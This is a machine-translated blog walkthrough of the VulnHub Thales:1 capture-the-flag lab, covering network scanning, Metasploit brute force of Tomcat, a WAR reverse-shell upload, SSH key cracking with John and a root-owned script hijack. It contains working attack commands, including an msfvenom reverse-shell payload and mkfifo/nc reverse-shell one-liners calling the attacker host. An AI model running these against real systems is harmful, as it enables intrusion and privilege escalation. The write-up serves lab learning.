当前位置:网站首页>[vulnhub range] thales:1
[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Catalog
3、 ... and 、 Elevated privileges
0x02 Dictionary explosion edit
Preface
describe
brief introduction : Open your eyes , Another angle
Include 2 A sign :user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Introduction to the environment kali 192.168.56.102 Thales Drone aircraft 192.168.56.101
One 、 information gathering
0x00 arp-scan scanning
arp-scan -I eth1 -l # Scan network card LAN
0x01 nmap scanning
Scan to two network segments Not sure which nmap Scan scan two IP
Open ports 22 and 8080
Visit Site , User name and password are required
Two 、 Exploit
0x00 msfconsole utilize
msf Search for tomcat login
To configure payload
user name tomcat password role1
Login successfully
0x01 Upload files
Look for function points , Found the upload point
utilize kali Generate war File Trojan do rebound shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload successful , And run
3、 ... and 、 Elevated privileges
0x00 rebound shell
Listening port
Upgrade transaction mutual shell
sudo -l # Need a password , Unknown stay home User found under file Thales
stay `notes.txt` Found in the file `/usr/local/bin/backup.sh View file contents
0x02 Dictionary explosion
Find out .ssh Folder
It is found that the private key can be used ssh2john.py Generate password file explosion
use ssh2john.py Compile the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Burst out the code vodka06
Switching users
0x03 user.txt
see user.txt--- first flag
notes.txt yes root The powers of the , There may be something inside
0x04 rebound shell
notice backup.sh It has executive authority , Can write bounce shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
File content editing will directly replace , Append for selection
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
monitor 9999, After writing, you will connect by yourself
summary
Thales Learned
msf The use of blasting dictionary
rsa Use of private key ciphertext
边栏推荐
- 讲师征集令 | Apache SeaTunnel(Incubating) Meetup 分享嘉宾火热招募中!
- The unity vector rotates at a point
- 【HCSD大咖直播】亲授大厂面试秘诀-简要笔记
- PHP实现微信小程序人脸识别刷脸登录功能
- There are many ways to realize the pause function in JS
- Migration and reprint
- Bidding announcement: Fujian Rural Credit Union database audit system procurement project (re bidding)
- Unity的三种单例模式(饿汉,懒汉,MonoBehaviour)
- pycharm 终端部启用虚拟环境
- Aerospace Hongtu information won the bid for the database system research and development project of a unit in Urumqi
猜你喜欢
Description of vs common shortcut keys
What are compiled languages and interpreted languages?
Numpy --- basic learning notes
喜讯!科蓝SUNDB数据库与鸿数科技隐私数据保护管理软件完成兼容性适配
Logback logging framework third-party jar package is available for free
预测——灰色预测
AE learning 01: AE complete project summary
深度之眼(七)——矩阵的初等变换(附:数模一些模型的解释)
过度依赖补助,大客户收款难,冲刺“国产数据库第一股”的达梦后劲有多足?
谈谈 SAP iRPA Studio 创建的本地项目的云端部署问题
随机推荐
thinkphp3.2.3中设置路由,优化url
SPI master RX time out interrupt
Apache Doris just "graduated": why should we pay attention to this kind of SQL data warehouse?
How to determine whether the checkbox in JS is selected
01tire+链式前向星+dfs+贪心练习题.1
hellogolang
应用程序和matlab的通信方式
There are many ways to realize the pause function in JS
Three singleton modes of unity (hungry man, lazy man, monobehavior)
2022 the 4th China (Jinan) International Smart elderly care industry exhibition, Shandong old age Expo
Rongyun won the 2022 China Xinchuang digital office portal excellence product award!
Power of leetcode-231-2
深度之眼(六)——矩阵的逆(附:logistic模型一些想法)
分步式监控平台zabbix
预测——灰色预测
How can laravel get the public path
Logback logging framework third-party jar package is available for free
PHP实现执行定时任务的几种思路详解
IP地址和物理地址有什么区别
121. The best time to buy and sell stocks